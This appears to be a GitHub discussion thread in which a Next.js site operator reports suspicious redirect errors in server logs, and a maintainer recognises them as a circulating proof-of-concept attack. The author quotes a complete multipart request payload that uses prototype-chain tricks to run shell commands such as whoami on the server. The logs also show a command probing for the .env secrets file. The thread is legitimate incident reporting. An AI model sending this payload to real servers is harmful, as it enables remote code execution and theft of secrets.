Redirect code being exploited? [email protected]/[email protected] #87038

gcb · 2025-12-10T20:41:26Z

gcb
Dec 10, 2025

Summary

since dec 5th, our logs started to show lots of errors for redirect.

⨯ [Error: NEXT_REDIRECT] { digest: '12334\nMEOWWWWWWWWW' }

today, they started to show what looks like shell output, e.g.

⨯ [Error: NEXT_REDIRECT] { digest: 'wwwuser' }

(where wwwuser is what you would get if you ran whoami from the node process)

and then

⨯ [Error: Command failed: test -f .env && echo EXISTS | base64 -w 0] {

i'm having a hard time to trace back those requests yet.

We did upgrade next for reactshell to [email protected]/[email protected], even though we don't have the affected dependencies (npm list react-server-dom-parcel react-server-dom-turbopack react-server-dom-webpack; └── (empty)) in exactly one hour after the announcement.

Additional information

No response

Example

No response

gcb · 2025-12-10T20:57:36Z

gcb
Dec 10, 2025
Author

sample request

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then": "$1:__proto__:then","status": "resolved_model","reason": -1,"value": "{\"then\":\"$B1337\"}","_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('(whoami)',{'timeout':120000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});","_chunks": "$Q2","_formData": {"get": "$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

3 replies

icyJoseph Dec 10, 2025
Maintainer

Hiyo, is there any chance you preserve previous deployments? - That is the PoC payload being spammed at you, I bet ya the action header is x too.

Or perhaps your server (machine) is running some other client/service that's also exposed to the internet and under the hood, uses Next.js?

icyJoseph Dec 10, 2025
Maintainer

I need to sign off soon - Could I ask you to route this to [email protected].

This email is listed here: https://vercel.com/kb/bulletin/react2shell#next-steps. I rather not make assumptions and loop in some more collaborators.

gcb Dec 11, 2025
Author

moving there. thanks!

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Redirect code being exploited? [email protected]/[email protected] #87038

Uh oh!

{{title}}

Uh oh!

Uh oh!

{{editor}}'s edit

{{editor}}'s edit

Uh oh!

Replies: 1 comment 3 replies

Uh oh!

{{title}}

Uh oh!

Uh oh!

{{title}}

Uh oh!

Uh oh!

{{editor}}'s edit

{{editor}}'s edit

Uh oh!

Uh oh!

{{title}}

Uh oh!

Uh oh!

{{title}}

Uh oh!

Select a reply

Uh oh!

Redirect code being exploited? [email protected]/[email protected] #87038

Uh oh!

Uh oh!

gcb Dec 10, 2025

Summary

Additional information

Example

Replies: 1 comment · 3 replies

Uh oh!

gcb Dec 10, 2025 Author

Uh oh!

Uh oh!

icyJoseph Dec 10, 2025 Maintainer

Uh oh!

icyJoseph Dec 10, 2025 Maintainer

Uh oh!

gcb Dec 11, 2025 Author

gcb
Dec 10, 2025

Replies: 1 comment 3 replies

gcb
Dec 10, 2025
Author

icyJoseph Dec 10, 2025
Maintainer

icyJoseph Dec 10, 2025
Maintainer

gcb Dec 11, 2025
Author